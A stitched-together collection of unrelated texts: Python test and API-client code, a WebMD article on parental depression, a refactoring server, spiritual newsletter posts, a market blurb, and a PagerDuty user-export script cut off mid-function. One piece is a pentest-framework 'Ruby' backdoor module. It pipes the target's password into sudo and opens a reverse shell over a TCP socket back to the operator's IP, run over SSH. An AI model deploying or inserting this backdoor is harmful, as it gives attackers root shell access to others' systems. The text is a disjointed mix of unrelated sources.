from restapi.models import WebRadio, AlarmClock
class Base(APITestCase):
    """Shared fixture base for the REST API tests.

    Creates two web radios and one alarm clock bound to each, so
    subclasses can exercise the WebRadio/AlarmClock relations.
    """

    def setUp(self):
        super(Base, self).setUp()
        # Two distinct radios so alarm->radio links can be told apart.
        self.test_webradio = WebRadio.objects.create(
            name="test", url="http://test.com")
        self.test_webradio2 = WebRadio.objects.create(
            name="test2", url="http://test2.com")
        # One alarm per radio, both firing at 08:20 on different weekdays.
        self.test_alarm = AlarmClock.objects.create(
            name="alarm1", monday=True, hour=8, minute=20,
            webradio=self.test_webradio)
        self.test_alarm2 = AlarmClock.objects.create(
            name="alarm2", wednesday=True, hour=8, minute=20,
            webradio=self.test_webradio2)
|
March 21, 2006 -- When parents' depression gets better, their kids' mental health improves. But when parents' depression doesn't lift, the kids' mental health gets worse.
The finding is part of the large STAR-D trial funded by the National Institutes of Mental Health. The study is trying to find out what it takes to put serious clinical depression into remission -- not just to improve symptoms, but also to get people over their illness.
Columbia University researcher Myrna M. Weissman, PhD, led a team that studied 151 depressed mothers enrolled in the STAR-D trial. The researchers also evaluated one of each woman's 7- to 17-year-old children. Their findings appear in the March 22/29 issue of The Journal of the American Medical Association.
"This offers dramatic evidence that children benefit from successful treatment of a parent's depression," Weissman tells WebMD.
The study has a dark side. When depression treatment didn't work -- or didn't reduce a mother's depressive symptoms by at least half -- children suffered worsening mental health.
In the STAR-D study, only a third of the mothers got fully better -- what doctors call remission -- within three months. Only half had a 50% reduction in symptoms, which is the minimal improvement found to help the depressed parent's children.
This means it's essential for a depressed parent to get immediate help and to stay with treatment until something works, says Eva Ritvo, MD. Ritvo is associate professor of psychiatry at the University of Miami's Miller School of Medicine and chief of psychiatry at Mount Sinai Medical Center in Miami Beach, Fla.
"Not only do children get well when the parent's depression gets better, but they get worse if the parent does not," Ritvo tells WebMD. "So a parent's depression should be treated early and aggressively and thoroughly. This tells us that depression is real, that treatment really helps, and that other family members are impacted by this disease and by its treatment."
Weissman's team found that at the beginning of the study, half the kids had a history of psychiatric disorders and a third were currently suffering from mental health problems.
The mothers all started treatment with Celexa, an SSRI antidepressant (as did all STAR-D participants).
If the mothers' depression fully lifted, the children's mental health problems decreased by 11%. If the mothers did not fully respond to treatment, their child's psychiatric diagnoses increased by 8%.
For the children who already had a mental health problem, 33% fully recovered -- that is, they lost their psychiatric diagnoses -- if their mothers' depression fully lifted. If the mothers' symptoms did not fully improve, only 12% of the kids fully recovered.
Even more impressive was what happened to children who hadn't yet suffered mental health problems. If the mothers' depression fully lifted, all the kids remained mentally healthy. But among mothers who didn't fully improve, 17% of their children were later diagnosed with a psychiatric disorder.
This shows the powerful effect of a parent's depression on a child, says child and family psychiatrist Marilyn B. Benoit, MD, past president of the American Academy of Child and Adolescent Psychiatry and clinical associate professor at Georgetown University in Washington, D.C.
"What you have to consider is, this is affecting the children on a day-to-day basis," Benoit says. "How the parent greets them in the morning sets the tone for their day. And if you have an ill-tempered, angry, or isolated parent, that changes the dynamics of the interaction immediately."
These effects are passed from generation to generation.
"In a previous study, we showed that depression was transmitted across generations," Weissman says. "And if a parent and grandparent are depressed, rates of anxiety and depression in the grandchild are very high."
The good news is that successful depression treatment counteracts this effect.
"This is big. Think of a funnel and how the impact of treating parents broadens as you look at their children and grandchildren," Benoit says. "By changing the parents' symptoms and changing the parent-child dynamics from negative to positive, you have affected the trajectory for a whole generation. And over 30 years, I have seen the third generation come along. I have seen how changing the grandparents has made life better for their grandchildren."
Only a third of the mothers enrolled in the STAR-D trial fully responded to treatment in the first phase of the study. But the whole point of the study is to keep treating patients until something works.
"If you start with antidepressant treatment and don't get full recovery, the story is not over," STAR-D study co-leader Madhukar H. Trivedi, MD, tells WebMD. Trivedi is professor of psychiatry and director of the mood disorders research program at the University of Texas Southwestern Medical Center.
Weissman, Ritvo, and Benoit stress that it's important not to give up on depression treatment -- especially for a parent.
"Mothering is a heavy task, and you have to be well to do it," Ritvo says. "If mothers with depression don't get well, we physicians have to be more aggressive in finding a treatment that works because more than one person is suffering."
"This is the message: Depression is a treatable disorder," Weissman says. "There are many treatments. In this case, it was medication. Sometimes it is psychotherapy. As a parent, you must know that depression is not your fault. It is a medical illness -- and you have to get help. So get treated and get better because it will help you and help the family."
Weissman says that while her study focused on mothers, she is sure that a father's depression also affects his children.
"Fathers get depressed. And they deserve the same kind of aggressive treatment," she says. "Fathers' rates of depression are not as high as in mothers, but their treatment is important."
Benoit says in most families, mothers still have more interaction with children than fathers. This means that a mother's depression often will have a stronger effect than a father's depression.
"If the father is depressed, the mothers tend to serve as a buffer from the father's pathology," Benoit says. "So that is why I think the mothers have a more critical role to play."
Treating the child of a depressed parent can help the child. But it's not as effective as getting to the root of the problem.
"It is possible to help the child cope with the parent's depression. By working with the children, you help them to get the protective buffer they need," Benoit says. "But there is nothing quite as good as getting that depressed parent treated."
SOURCES: Weissman, M.M. The Journal of the American Medical Association, March 22/29, 2006; vol 295: pp 1389-1398. Myrna M. Weissman, PhD, professor of epidemiology and psychiatry and chief, division of clinical and genetic epidemiology, New York State Psychiatric Institute, New York; faculty member, School of Public Health and department of psychiatry, Columbia University, New York. Marilyn B. Benoit, MD, private practice psychiatry; past president, American Academy of Child and Adolescent Psychiatry; clinical associate professor, Georgetown University, Washington, D.C. Eva Ritvo, MD, associate professor of psychiatry, University of Miami Miller School of Medicine; chief of psychiatry, Mount Sinai Medical Center, Miami Beach, Fla.; co-author, The Concise Guide to Marital and Family Therapy. Madhukar H. Trivedi, MD, professor of psychiatry and director, mood disorders research program, University of Texas Southwestern Medical Center.
|
import urllib.request
import urllib.parse
import json
class Client(object):
    """Minimal client for the rekognition.com face-recognition HTTP API."""

    API_HOME = "https://rekognition.com/func/api/"

    def __init__(self, api_key, api_secret, name_space="demo_project", user_id="demo_user"):
        self.api_key = api_key
        self.api_secret = api_secret
        self.name_space = name_space
        self.user_id = user_id

    def face_recognize(self, image_url, **kwargs):
        """POST a face_recognize job; truthy kwargs become job suffixes.

        The image is sent under the API field named "base64" (the field
        name the service expects; a URL is accepted here).
        """
        enabled = [option for option in kwargs if kwargs[option]]
        jobs = "_".join(["face_recognize"] + enabled)
        parameters = self.__make_initial_parameters()
        parameters["jobs"] = jobs
        parameters["base64"] = image_url
        return self.__request(parameters)

    def __make_initial_parameters(self):
        """Credentials and scoping fields common to every request."""
        return {
            "api_key": self.api_key,
            "api_secret": self.api_secret,
            "name_space": self.name_space,
            "user_id": self.user_id,
        }

    @classmethod
    def __request(cls, parameters):
        """Send a form-encoded POST to API_HOME and decode the JSON reply."""
        payload = urllib.parse.urlencode(parameters).encode("utf-8")
        request = urllib.request.Request(cls.API_HOME, payload)
        with urllib.request.urlopen(request) as response:
            body = response.read()
        return json.loads(body.decode("utf-8"))
|
Explanation. Required for extension on course work past the day grades are due (one week after end of final exams or in Spring and Summer, three weeks after the last class meeting). Requires approval by instructor and Registrar. If you don't meet the extended deadline, you get the grade you earned to that point (usually an F). See policies on extensions and I grades in the Academic Guide. Warning: your graduation date may be changed if you get an extension past it. Extensions are usually limited to cases of hardship.
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Tests things related to ARCHS.
"""
import TestGyp
import TestMac
import re
import subprocess
import sys
if sys.platform == 'darwin':
  test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])

  # With no ARCHS set, the build should use the toolchain default:
  # x86_64 from Xcode 5.0 onwards, i386 before that.
  test.run_gyp('test-no-archs.gyp', chdir='archs')
  test.build('test-no-archs.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test', chdir='archs')
  test.must_exist(result_file)

  if TestMac.Xcode.Version() >= '0500':
    expected_type = ['x86_64']
  else:
    expected_type = ['i386']
  TestMac.CheckFileType(test, result_file, expected_type)

  # An explicit, valid ARCHS list is honored.
  test.run_gyp('test-valid-archs.gyp', chdir='archs')
  test.build('test-valid-archs.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test', chdir='archs')
  test.must_exist(result_file)
  TestMac.CheckFileType(test, result_file, ['x86_64'])

  test.run_gyp('test-archs-x86_64.gyp', chdir='archs')
  test.build('test-archs-x86_64.gyp', test.ALL, chdir='archs')
  result_file = test.built_file_path('Test64', chdir='archs')
  test.must_exist(result_file)
  TestMac.CheckFileType(test, result_file, ['x86_64'])

  test.run_gyp('test-dependencies.gyp', chdir='archs')
  test.build('test-dependencies.gyp', target=test.ALL, chdir='archs')
  products = ['c_standalone', 'd_standalone']
  for product in products:
    result_file = test.built_file_path(
        product, chdir='archs', type=test.STATIC_LIB)
    test.must_exist(result_file)

  # Fat (multi-arch) binaries are not supported by the make generator.
  if test.format != 'make':
    # Build all targets except 'exe_32_64_no_sources' that does build
    # but should not cause error when generating ninja files
    targets = [
      'static_32_64', 'shared_32_64', 'shared_32_64_bundle',
      'module_32_64', 'module_32_64_bundle',
      'exe_32_64', 'exe_32_64_bundle', 'precompiled_prefix_header_mm_32_64',
    ]

    test.run_gyp('test-archs-multiarch.gyp', chdir='archs')
    for target in targets:
      test.build('test-archs-multiarch.gyp', target=target, chdir='archs')

    result_file = test.built_file_path(
        'static_32_64', chdir='archs', type=test.STATIC_LIB)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path(
        'shared_32_64', chdir='archs', type=test.SHARED_LIB)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path('My Framework.framework/My Framework',
                                       chdir='archs')
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])
    # Check that symbol "_x" made it into both versions of the binary.
    # Fix: check_output() returns bytes on Python 3, so decode before the
    # substring test ('str in bytes' raises TypeError there); also use a
    # generator instead of materializing a list for all().
    if not all('D _x' in subprocess.check_output(
        ['nm', '-arch', arch, result_file]).decode('utf-8')
        for arch in ['i386', 'x86_64']):
      # This can only flakily fail, due to process ordering issues. If this
      # does fail flakily, then something's broken, it's not the test at fault.
      test.fail_test()

    result_file = test.built_file_path(
        'exe_32_64', chdir='archs', type=test.EXECUTABLE)
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

    result_file = test.built_file_path('Test App.app/Contents/MacOS/Test App',
                                       chdir='archs')
    test.must_exist(result_file)
    TestMac.CheckFileType(test, result_file, ['i386', 'x86_64'])

  # TestGyp requires an explicit pass; without this the harness reports
  # the test as failed even when every check above succeeded.
  test.pass_test()
|
Where would the South African comedy scene be without Kagiso Lediga? The filmmaker, actor and comedian behind some of the country's most loved comedy shows and films will speak at Design Indaba Conference 2019.
This year has been one of profound loss for the South African entertainment industry. Earlier this year we lost Bra Hugh Masekela, whose contribution to the country's cultural landscape includes the Bantu Hour, a scripted comedy show hosted by Kagiso Lediga.
It's easy to look at the South African entertainment industry today and forget that back in the '90s, it was not common to see black people doing sketch shows on television. But this was the moment that Lediga introduced the country to the Pure Monate Show (PMS), a comedy sketch show that would go on to be a launching pad for some of the country's top comedians, including Loyiso Gola, Trevor Noah and many more.
...The timing was right, kinda post-apartheid and the first time there were standup comedians in South Africa who weren't all old white guys. Having all those guys come together, these brand-new voices, saying stuff on TV that people were only saying in the comedy clubs, that was so cool and challenging. It was like the perfect storm. And it did well because everyone thought it was their show. It was the most crossover thing we've ever done.
Lediga went on to produce a movie starring Pearl Thusi, Andrew Buckland and Zandile Tisani called Catching Feelings. The film was one of the countrys first to be picked up by international streaming service, Netflix.
The New York Times' Glenn Kenny said the film was notable both for its considerable comedic flair and its detailed depiction of Johannesburg.
Kagiso will be in good company on the Design Indaba 2019 stage, where he will be joined by another filmmaker, Wanuri Kahiu; costume designer for cult favourites like The Handmaid's Tale, Ane Crabtree; and curator Hannah Harry, among many others.
|
from backdoors.backdoor import *
import time
class Ruby(Backdoor):
    """Pentest-framework module; see help_text for what it does."""

    # Interactive prompt shown for this module in the framework shell.
    prompt = Fore.RED + "(rb) " + Fore.BLUE + ">> " + Fore.RESET

    def __init__(self, core):
        cmd.Cmd.__init__(self)
        self.intro = GOOD + "Using Ruby module..."
        self.core = core
        # Configurable options; only the callback port here.
        self.options = {
            "port" : Option("port", 53937, "port to connect to", True),
        }
        self.modules = {}
        self.allow_modules = True
        self.help_text = INFO + "Uses ruby to open a socket and redirect I/O to /bin/sh."

    def get_command(self):
        """Build the remote one-liner (echoes the stored password to sudo -S)."""
        command = "echo " + self.core.curtarget.pword + " | sudo -S ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"" + self.core.localIP + "\",\"" + str(self.get_value("port")) + "\");while(cmd=c.gets);IO.popen(cmd,\"r\"){ |io| c.print io.read } end'"
        print(command)
        return command

    def do_exploit(self, args):
        """Start the local listener, then run the command on the target via SSH."""
        print(GOOD + "Initializing backdoor...")
        self.listen(prompt="none")
        self.core.curtarget.ssh.exec_command(self.get_command())
        print(GOOD + "Ruby backdoor on " + str(self.get_value("port")) + " attempted.")
        for mod in self.modules.keys():
            print(INFO + "Attempting to execute " + mod.name + " module...")
            mod.exploit()
|
As soon as I received Heavenletters from a friend, they resonated with me. I wanted to share them with my friends because they state so eloquently how to deal with some of the more difficult situations in life and career. In order to move on from them --- and to face other creative and momentous challenges -- change is necessary.
There are some tough questions in life, and these letters get to the heart of it all. They are profound, my reality, and they are sound advice for those that want to have a happy, fulfilled life. They are guides to finding our own personal truths.
This was the trip of a lifetime. Heaven Admin and I were blessed with amazing people and amazing Godwriting Workshops. We were part of a great circle of love with God right in the middle. Supreme thanks to all the sponsors and all the attendees and all the hearts that overwhelmed ours. You are overwhelming us still.
Not only do we have the best translators in the world, we have the most beautiful, do you agree?
I'm (Heaven Admin) making my way to the US this Friday, October 30, first to California for a weekend workshop event (see below) and then to Fairfield, Iowa.
When I look into the eyes of any of my brothers or sisters, it is like the circle is complete. There is a connection and a divine realisation in that moment. Just the thought puts a big smile on my face. I know there will be many such moments while traveling through the US towards Argentina.
We are looking for a motorhome! It has to be diesel so we can fuel it with bio-diesel and reduce our carbon emissions. At this stage we have several strong ideas on how to fund the journey. Please send us your ideas and suggestions.
In addition to getting closer to God through Godwriting ™ workshops, the theme of the Oneness Journey will be to create an international network of sustainable spiritual communities. There are such communities scattered through the Americas and the Oneness Journey will be used to provide a platform for sharing of knowledge and experience amongst these communities. This network will form one large international sustainable community supporting the development of more communities and providing stewardship for existing colonies. God will be the common reference point that will unite the diversity within these communities; and sustainability with highest respect and care for Mother Earth and all of life will be of highest priority.
We are thinking about doing a ceremony at each community which joins the network. And of course many Godwriting workshops along the way!
The intention is to start the journey as soon as we can, so both Gloria and I are focusing on this NOW! We will have an ongoing website to keep you up-to-date.
Godwriting Workshop tour in India!
Kambala who runs an orphanage in India invites us to a month-long Godwriting™ Workshop Tour – and he wants Heavenreaders to come too!
It is the will of God. I believe it strongly and faithfully. This is the good season to travel in India and for the workshop of Heavenletters in India.
As one family, I am not only brother to you but entire Heaven letter family like Santhan, Edna and so on all over the world. We are human community in God’s love and HIS letters from Heaven, the presence of God Almighty.
So I invite you all once again, you and Santhan and Edna some one else who are in Heaven letters.
I called Edna after you left from Israel. She received me well and talked to me so nicely lovely kind compassionately. I love her so much. I told her how much you loved me and help me to run children service here in India as well as I told her that I am an official Heaven letters translator by our leader Gloria for my local language Telugu. She was amazed...please tell her about me more and what I am doing in India and how I am united with Heaven letters. Then she will come happily to India with you.
I will look after boarding and lodging for our Heaven letter team who come with you. Maybe 100 persons. No doubt the God is with me and my family full support with our team here to serve you for the workshop, and you can see rural India and so many wonderful things and projects which are run by me.
Your brother Kambala, here on earth and God is there in heaven.......so he will supply all our needs. Amen!!!!!!!!
Beloved Kambala with the big heart, will you kindly send us your translations?
How very much we would love to meet you and your family and team in India and to give Godwriting workshops in India. We will do it. God will tell us when. We just can’t name a time right now because the Oneness Journey is on the way!
Here is $300 for the ONENESS Tour. And please enjoy it even more than in Europe!!!
Just a note that I can't imagine enjoying anything more than the European Godwriting Tour. Is it possible? Well, we shall find out!
Beloved Rozes, I just found your response. Too late to be of help. I am so sorry because we do have some great subscribers in Mexico who would have wanted to show you around.
The tech angels are working on getting Heaven News where we will see responses such as yours on the Community Page of the forum so we will always know when there is response.
God bless you. Hope you had a great time in Mexico.
Just wanted to come back and take a look. Probably to memorize all that went on in Istanbul. I've missed Istanbul!
|
# Arguments are:
# 1. Working directory.
# 2. Rope folder
import difflib
import io
import json
import os
import sys
import traceback
try:
    import rope
    from rope.base import libutils
    from rope.refactor.rename import Rename
    from rope.refactor.extract import ExtractMethod, ExtractVariable
    import rope.base.project
    import rope.base.taskhandle
except:
    # Rope is an optional third-party dependency; report the failure as a
    # JSON payload on stderr so the host editor can surface it.
    # NOTE(review): this is a bare `except:` and execution continues after
    # the message, so any later use of the rope names raises NameError --
    # confirm whether `except ImportError:` plus sys.exit() is intended.
    jsonMessage = {
        "error": True,
        "message": "Rope not installed",
        "traceback": "",
        "type": "ModuleNotFoundError",
    }
    sys.stderr.write(json.dumps(jsonMessage))
    sys.stderr.flush()
# First CLI argument: the workspace root the refactorings operate on.
WORKSPACE_ROOT = sys.argv[1]
# Rope keeps its project metadata inside the workspace's .vscode folder.
ROPE_PROJECT_FOLDER = ".vscode/.ropeproject"
class RefactorProgress:
    """Progress snapshot for a running refactor task: a task name, an
    optional status message, and a completion percentage."""

    def __init__(self, name="Task Name", message=None, percent=0):
        self.name, self.message, self.percent = name, message, percent
class ChangeType:
    """Kind of file change produced by a refactoring (integer enum)."""

    EDIT = 0    # modify an existing file in place
    NEW = 1     # create a new file
    DELETE = 2  # remove a file


class Change:
    """One file change: the file's path, its change kind, and a diff.

    The EDIT/NEW/DELETE constants duplicate ChangeType and are kept so
    existing callers reading them off Change keep working.
    """

    EDIT = 0
    NEW = 1
    DELETE = 2

    def __init__(self, filePath, fileMode=ChangeType.EDIT, diff=""):
        self.filePath = filePath
        self.diff = diff
        self.fileMode = fileMode
def get_diff(changeset):
    """Return a unified diff ("a/<path>" vs "b/<path>") for a rope changeset.

    Adapted from rope's ChangeSet.get_description method.
    """
    new = changeset.new_contents
    old = changeset.old_contents
    if old is None:
        # Rope leaves old_contents unset for on-disk resources; read the
        # file, or treat a not-yet-existing resource as empty.
        if changeset.resource.exists():
            old = changeset.resource.read()
        else:
            old = ""
    # Ensure code has a trailing newline before generating a diff.
    # https://github.com/Microsoft/vscode-python/issues/695.
    old_lines = old.splitlines(True)
    # Fix: guard on `old_lines` -- the original indexed old_lines[-1]
    # unconditionally and raised IndexError when the old contents were
    # empty (e.g. diffing against a new, empty file).
    if old_lines and not old_lines[-1].endswith("\n"):
        old_lines[-1] = old_lines[-1] + os.linesep
        new = new + os.linesep
    result = difflib.unified_diff(
        old_lines,
        new.splitlines(True),
        "a/" + changeset.resource.path,
        "b/" + changeset.resource.path,
    )
    return "".join(result)
class BaseRefactoring(object):
    """
    Base class for refactorings.

    Wires a rope TaskHandle to an optional progress callback and collects
    the resulting Change objects in ``self.changes``.
    """

    def __init__(self, project, resource, name="Refactor", progressCallback=None):
        self._progressCallback = progressCallback
        self._handle = rope.base.taskhandle.TaskHandle(name)
        self._handle.add_observer(self._update_progress)
        self.project = project
        self.resource = resource
        self.changes = []

    def _update_progress(self):
        """Task-handle observer: forward jobset progress to the callback.

        Fix: the original checked ``not self._progressCallback is None``
        twice (non-idiomatic and redundant); replaced with single
        ``is None`` guard clauses.
        """
        if self._progressCallback is None:
            return
        jobset = self._handle.current_jobset()
        if not jobset:
            return
        progress = RefactorProgress()
        # Current job set name.
        if jobset.get_name() is not None:
            progress.name = jobset.get_name()
        # Active job name.
        if jobset.get_active_job_name() is not None:
            progress.message = jobset.get_active_job_name()
        # Done percentage, when rope can compute one.
        percent = jobset.get_percent_done()
        if percent is not None:
            progress.percent = percent
        self._progressCallback(progress)

    def stop(self):
        """Ask rope to cancel the running refactor."""
        self._handle.stop()

    def refactor(self):
        """Run onRefactor(), swallowing rope's user-cancellation signal."""
        try:
            self.onRefactor()
        except rope.base.exceptions.InterruptedTaskError:
            # We can ignore this exception, as the user cancelled the
            # refactoring.
            pass

    def onRefactor(self):
        """
        To be implemented by each subclass.
        """
        pass
class RenameRefactor(BaseRefactoring):
    """Renames the symbol at a given offset across the project."""

    def __init__(
        self,
        project,
        resource,
        name="Rename",
        progressCallback=None,
        startOffset=None,
        newName="new_Name",
    ):
        BaseRefactoring.__init__(self, project, resource, name, progressCallback)
        self._newName = newName
        self.startOffset = startOffset

    def onRefactor(self):
        """Compute the rename changes and record them as unified diffs."""
        rename_op = Rename(self.project, self.resource, self.startOffset)
        change_set = rename_op.get_changes(self._newName, task_handle=self._handle)
        for changed in change_set.changes:
            if not isinstance(changed, rope.base.change.ChangeContents):
                raise Exception("Unknown Change")
            self.changes.append(
                Change(changed.resource.real_path, ChangeType.EDIT, get_diff(changed))
            )
class ExtractVariableRefactor(BaseRefactoring):
    """Extracts the selected expression into a new variable."""

    def __init__(
        self,
        project,
        resource,
        name="Extract Variable",
        progressCallback=None,
        startOffset=None,
        endOffset=None,
        newName="new_Name",
        similar=False,
        global_=False,
    ):
        BaseRefactoring.__init__(self, project, resource, name, progressCallback)
        self._newName = newName
        self._startOffset = startOffset
        self._endOffset = endOffset
        self._similar = similar
        self._global = global_

    def onRefactor(self):
        """Compute the extract-variable changes and record them as diffs."""
        extractor = ExtractVariable(
            self.project, self.resource, self._startOffset, self._endOffset
        )
        change_set = extractor.get_changes(self._newName, self._similar, self._global)
        for changed in change_set.changes:
            if not isinstance(changed, rope.base.change.ChangeContents):
                raise Exception("Unknown Change")
            self.changes.append(
                Change(changed.resource.real_path, ChangeType.EDIT, get_diff(changed))
            )
class ExtractMethodRefactor(ExtractVariableRefactor):
    """Extracts the selected statements into a new method."""

    def __init__(
        self,
        project,
        resource,
        name="Extract Method",
        progressCallback=None,
        startOffset=None,
        endOffset=None,
        newName="new_Name",
        similar=False,
        global_=False,
    ):
        ExtractVariableRefactor.__init__(
            self,
            project,
            resource,
            name,
            progressCallback,
            startOffset=startOffset,
            endOffset=endOffset,
            newName=newName,
            similar=similar,
            global_=global_,
        )

    def onRefactor(self):
        """Compute the extract-method changes and record them as diffs."""
        extractor = ExtractMethod(
            self.project, self.resource, self._startOffset, self._endOffset
        )
        change_set = extractor.get_changes(self._newName, self._similar, self._global)
        for changed in change_set.changes:
            if not isinstance(changed, rope.base.change.ChangeContents):
                raise Exception("Unknown Change")
            self.changes.append(
                Change(changed.resource.real_path, ChangeType.EDIT, get_diff(changed))
            )
class RopeRefactoring(object):
    """Serves refactoring requests read line-by-line from stdin and
    writes JSON responses to stdout."""

    def __init__(self):
        self.default_sys_path = sys.path
        self._input = io.open(sys.stdin.fileno(), encoding="utf-8")

    def _create_project(self, indent_size):
        """Open the rope project for the current workspace.

        Extracted: the three refactor methods previously duplicated this.
        """
        return rope.base.project.Project(
            WORKSPACE_ROOT,
            ropefolder=ROPE_PROJECT_FOLDER,
            save_history=False,
            indent_size=indent_size,
        )

    def _collect_diffs(self, refactor, project):
        """Run a refactoring, close the project and return [{"diff": ...}]."""
        refactor.refactor()
        changes = refactor.changes
        project.close()
        return [{"diff": change.diff} for change in changes]

    def _rename(self, filePath, start, newName, indent_size):
        """
        Renames a variable
        """
        project = self._create_project(indent_size)
        resourceToRefactor = libutils.path_to_resource(project, filePath)
        refactor = RenameRefactor(
            project, resourceToRefactor, startOffset=start, newName=newName
        )
        return self._collect_diffs(refactor, project)

    def _extractVariable(self, filePath, start, end, newName, indent_size):
        """
        Extracts a variable
        """
        project = self._create_project(indent_size)
        resourceToRefactor = libutils.path_to_resource(project, filePath)
        refactor = ExtractVariableRefactor(
            project,
            resourceToRefactor,
            startOffset=start,
            endOffset=end,
            newName=newName,
            similar=True,
        )
        return self._collect_diffs(refactor, project)

    def _extractMethod(self, filePath, start, end, newName, indent_size):
        """
        Extracts a method
        """
        project = self._create_project(indent_size)
        resourceToRefactor = libutils.path_to_resource(project, filePath)
        refactor = ExtractMethodRefactor(
            project,
            resourceToRefactor,
            startOffset=start,
            endOffset=end,
            newName=newName,
            similar=True,
        )
        return self._collect_diffs(refactor, project)

    def _serialize(self, identifier, results):
        """
        Serializes the refactor results
        """
        return json.dumps({"id": identifier, "results": results})

    def _deserialize(self, request):
        """Deserialize request from VSCode.

        Args:
            request: String with raw request from VSCode.

        Returns:
            Python dictionary with request data.
        """
        return json.loads(request)

    def _process_request(self, request):
        """Accept serialized request from VSCode and write response."""
        request = self._deserialize(request)
        lookup = request.get("lookup", "")
        if lookup == "":
            # Empty lookup: nothing to do, no response is written.
            pass
        elif lookup == "rename":
            changes = self._rename(
                request["file"],
                int(request["start"]),
                request["name"],
                int(request["indent_size"]),
            )
            return self._write_response(self._serialize(request["id"], changes))
        elif lookup == "extract_variable":
            changes = self._extractVariable(
                request["file"],
                int(request["start"]),
                int(request["end"]),
                request["name"],
                int(request["indent_size"]),
            )
            return self._write_response(self._serialize(request["id"], changes))
        elif lookup == "extract_method":
            changes = self._extractMethod(
                request["file"],
                int(request["start"]),
                int(request["end"]),
                request["name"],
                int(request["indent_size"]),
            )
            return self._write_response(self._serialize(request["id"], changes))

    def _write_response(self, response):
        """Write a single response line for the extension to consume."""
        sys.stdout.write(response + "\n")
        sys.stdout.flush()

    def watch(self):
        """Process requests from stdin until the process is terminated."""
        self._write_response("STARTED")
        while True:
            try:
                self._process_request(self._input.readline())
            except Exception:
                # Was a bare `except:`; catching Exception instead lets
                # SystemExit/KeyboardInterrupt actually terminate the server.
                # Everything else is reported to stderr and serving continues.
                exc_type, exc_value, exc_tb = sys.exc_info()
                tb_info = traceback.extract_tb(exc_tb)
                jsonMessage = {
                    "error": True,
                    "message": str(exc_value),
                    "traceback": str(tb_info),
                    "type": str(exc_type),
                }
                sys.stderr.write(json.dumps(jsonMessage))
                sys.stderr.flush()
# Entry point: start the refactoring server loop when run as a script.
if __name__ == "__main__":
    RopeRefactoring().watch()
|
While mobile device-reliant VR shipments—such as Samsung Gear VR and Google Daydream—dwarf today’s other VR device types, standalone devices will see a 405 percent compound annual growth rate (CAGR) through 2021, compared to a 42 percent CAGR for mobile VR. New device players, including Royole and Pico, have already entered the global market, with many other Chinese manufacturers poised to expand.
With an influx of standalone VR devices incoming, a greater range of use cases will be explored, broadening the gaming-focused VR market of today. ABI Research anticipates a total market size of $64 billion by 2021.
Non-gaming software and content, VR advertising, and VR-related video revenue will together hold a significant portion of the market. VR applications in retail and marketing will therefore see a 124 percent CAGR through 2021. Video, education, and tourism are expected to see significant growth, as well, and while not forecast to be as large as the gaming market, will be notable.
|
#!/usr/bin/env python
#
# Copyright (c) 2016, PagerDuty, Inc. <info@pagerduty.com>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of PagerDuty Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL PAGERDUTY INC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import requests
from datetime import datetime, timedelta
import csv
# Replace with your PagerDuty REST API key before running the export.
ACCESS_TOKEN = 'ACCESS_TOKEN' # Should be a v2 token, can be read only
def pd_get(endpoint, payload=None):
    """Handle all PagerDuty GET requests.

    :param endpoint: API path such as ``'/users'``
    :param payload: optional dict of query-string parameters
    :returns: the decoded JSON response body
    :raises Exception: if the API answers with any non-200 status
    """
    response = requests.get(
        'https://api.pagerduty.com{endpoint}'.format(endpoint=endpoint),
        params=payload,
        headers={
            'Accept': 'application/vnd.pagerduty+json;version=2',
            'Content-type': 'application/json',
            'Authorization': 'Token token={token}'.format(token=ACCESS_TOKEN)
        }
    )
    if response.status_code != 200:
        raise Exception('GET request failed with status {code}'.format(
            code=response.status_code
        ))
    return response.json()
def list_users(team_id=None):
    """List all users in the account, following API pagination."""
    base_payload = {
        'limit': 100,
        'include[]': ['contact_methods'],
        'team_ids[]': [team_id]
    }
    output = pd_get('/users', base_payload)
    page = output
    offset = 0
    # Keep fetching 100-user pages while the API reports more results.
    while page['more']:
        offset += 100
        page = pd_get('/users', dict(base_payload, offset=offset))
        output['users'] += page['users']
    return output
def parse_user_info(users):
    """Parse relevant user info for reporting.

    Each user is reduced to name/id/email/role plus a flattened list of
    contact methods; users without any contact method get a single
    all-None placeholder entry so a CSV row is still produced for them.
    """
    output = []
    for user in users:
        methods = []
        for method in user['contact_methods']:
            entry = {
                'label': method['label'],
                'type': method['type'],
                'id': method['id']
            }
